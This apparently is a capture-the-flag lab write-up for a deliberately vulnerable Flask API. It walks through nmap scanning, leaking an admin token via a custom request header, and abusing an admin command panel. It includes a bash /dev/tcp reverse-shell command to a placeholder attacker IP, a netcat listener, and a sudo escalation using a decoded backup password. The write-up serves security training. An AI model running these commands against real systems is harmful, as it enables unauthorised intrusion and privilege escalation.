Target Details

  • Target IP: 10.10.149.135

Service Discovery

  • Scan Open ports using nmap

    $ sudo nmap -sS -sV -sC -Pn -A -oN nmap.txt 10.10.149.135
    Nmap scan report for 10.10.149.135
    Host is up (0.45s latency).
    Not shown: 997 closed tcp ports (reset)
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   3072 86:65:28:5a:90:b3:1f:8e:9c:0b:62:3a:71:4b:97:37 (RSA)
    |   256 87:37:9b:9d:fc:c4:dd:bc:21:0c:d9:a2:ab:96:90:be (ECDSA)
    |_  256 a2:fd:4a:10:db:5b:ce:3d:c2:2c:c0:0c:8f:be:6c:41 (ED25519)
    80/tcp   open  http    nginx 1.18.0 (Ubuntu)
    |_http-title: Welcome to nginx!
    |_http-server-header: nginx/1.18.0 (Ubuntu)
    5000/tcp open  upnp?
    | fingerprint-strings:
    |   GenericLines:
    |     HTTP/1.1 400 Bad Request
    ...
    
    ...
    Network Distance: 4 hops
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    TRACEROUTE (using port 143/tcp)
    HOP RTT       ADDRESS
    1   354.40 ms 10.2.0.1
    2   ... 3
    4   447.88 ms 10.10.149.135
    
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    
  • Services Found:

Service Port Version
SSH 22 OpenSSH 8.2p1
nginx HTTP 80 /1.18.0
Web Service 5000 Unknown
  • Answer the Task questions

Content Discovery

  • Visit the web application in browser

  • Common endpoints are /api or api.domain.com,

    /api worked!

  • We can find other endpoints by manually by crawling through the web application with burpsuite proxy running

  • On inspecting the html, the admin has left a message in webpage comment for the hacker!

    <!--     
    This is a normal login page, I've always been smarter than you, I've only created sign up action to `users` using API!
    If you want access, Hack the way in by finding endpoint and signing up or find flaw in the endpoint!
      
    - vuln admin
    -->
    

    from comment we can make conclusion that, we cannot directly sign up from the login page, we need to find api endpoint to sign up. admin has also provided hint to the endpoint for users sign up

  • On visiting /api/users endpoint, we get json response, providing information about other users!!

    {
      "users": [
        {
          "userid": 1,
          "first_name": "Martin",
          "last_name": "Rodriguez",
          "admin": false
        },
        {
          "userid": 2,
          "first_name": "Kristen",
          "last_name": "Martin",
          "admin": false
        },
        ....
        {
          "userid": 27,
          "first_name": "Derek",
          "last_name": "Washington",
          "admin": true
        }
      ]
    }
    

    We got user details names, user Id and their role while using the application

  • In most of the cases, endpoint supports various http methods, let’s verify it using OPTIONS method. Let’s visit the same users enpoint and send the request to repeater this time, and change HTTP method from GET to POST

    GET /api/users HTTP/1.1
    
    # change to
    OPTIONS /api/users HTTP/1.1
    
  • On visiting dmdhrumilmistry GitHub Profile repos, Vulnerable-API-App app.py file, we can retrieve all the endpoints from the file. The useful ones for now are listed below.
  • Endpoints Discovered using burpsuite
Endpoint HTTP Methods Allowed
/api/users/ DELETE, HEAD, OPTIONS, GET
/api/users POST, OPTIONS, HEAD, GET

Exploit Endpoints

  • from /api/user/<userid:int> endpoint we can get user details, from /api/users endpoint we can retrieve admin user id and try to get their account details. For my case admin id is 27.

    admin id will vary

  • Send Burp Request to /api/user/27, we’ll receive json response as

    {
      "admin": true,
      "first_name": "Derek",
      "last_name": "Washington",
      "userid": 27
    }
    
  • Using first question hint, we know that we need to send Hide-Info header in the HTTP request.

    • Burp Request
    GET /api/user/27 HTTP/1.1
    Hide-Info: 0
    
    • Burp Json Response
    {
      "admin": true,
      "email": "[email protected]",
      "first_name": "Derek",
      "last_name": "Washington",
      "token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTY1NzcwODY4OSwianRpIjoiYjBhNzdmODgtZjcyMS00ZjhkLTgyOGUtYWRlNzIwZjI3ODcwIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImFkbWluQHZ1bG4tYXBpLWFwcC5jb20iLCJuYmYiOjE2NTc3MDg2ODl9.94MZ1fRrRrIdt_FFnLQdjGMWHbvA5_cSnwYfiaVl0Jw",
      "userid": 27
    }
    

    Now we’ve received token

  • We can add token in BurpSuite every request using Custom Header Extension, Refer docs for installation and usage, then add authorization token to extension.

  • Now, Add http://10.10.149.135:5000, and capture in scope requests only.

  • configure Custom Header extension to add header while using proxy using

    • Project Options
    • Sessions
    • From Session Handling rules click on add button
    • provide description
    • Click on Add button from Rule Actions
    • Choose Invoke Burp Extension
    • Set extension handler to Add Custom Header
    • Click on OK
    • From Scope tab, click on Proxy checkbox to add headers while using proxy. Also set URL scope to set Suite Scope
    • Click on OK
  • Visit HomePage http://10.10.149.135:5000

Get Target Machine Shell

  • Visit HomePage, with login admin auth token

  • From HomePage, visit Admin Controls tab, from where we can run bash commands

  • Using GTFObins Bash Reverse Shell get access to reverse shell

  • Start Netcat on attacker’s machine

    nc -nlvp 4444
    
  • Enter below command in command input field

    bash -c 'exec bash -i &>/dev/tcp/ATTACKER_THM_IP/4444 <&1'
    
  • On Execution of command, we get a reverse shell on the attacker machine

    $ nc -nlvp 4444
    listening on [any] 4444 ...
    connect to [ATTACKER_THM_IP] from (UNKNOWN) [10.10.226.214] 33472
    bash: cannot set terminal process group (610): Inappropriate ioctl for device
    bash: no job control in this shell
    [email protected]:~/deployment/apps/Vulnerable-API-app$
    

Get User Flag

  • Read User Flag

    [email protected]:~/deployment/apps/Vulnerable-API-app$ cat $HOME/user.txt
    THM{REDACTED}
    

Privilege Escalation

  • Checking if vulnadmin has sudo permissions

    [email protected]:~$ groups
    sudo adm cdrom dip plugdev lxd
    

    vulnadmin has sudo permission, but first we need to find its password to run sudo command

  • On Listing Files in vulnadmin home directory, we find a backup.txt file

    [email protected]:~$ ls -l
    total 12
    -rw-rw-r-- 1 vulnadmin vulnadmin   45 Jul 12 14:58 backup.txt
    drwxrwxr-x 3 vulnadmin vulnadmin 4096 Jul 12 11:27 deployment
    -rw-rw-r-- 1 vulnadmin vulnadmin   30 Jul 12 13:21 user.txt
    
  • On Reading file, it seems to be encoded in base64 format

  • Decode backup.txt file

    [email protected]:~$ cat backup.txt | base64 -d
    {REDACTED}
    

    It’s password for vulnadmin account

  • To run sudo command we need to spawn terminal first, since the deployed application is running flask which is a python framework, python must be installed which can be verified using

    [email protected]:~$ python3 --version
    Python 3.8.10
    
  • Get Interactive Shell

    [email protected]:~$ python3 -c 'import pty;pty.spawn("/bin/bash")'
    
  • List commands which can be run as with root privileges by vulnadmin

    [email protected]:~$ sudo su
    [sudo] password for vulnadmin: {REDACTED}
    [email protected]:/home/vulnadmin/#
    
  • Get Root Flag

    [email protected]:~# cat /root/root.txt
    cat /root/root.txt
    THM{REDACTED}
    
  • We’ve successfully Rooted the machine!!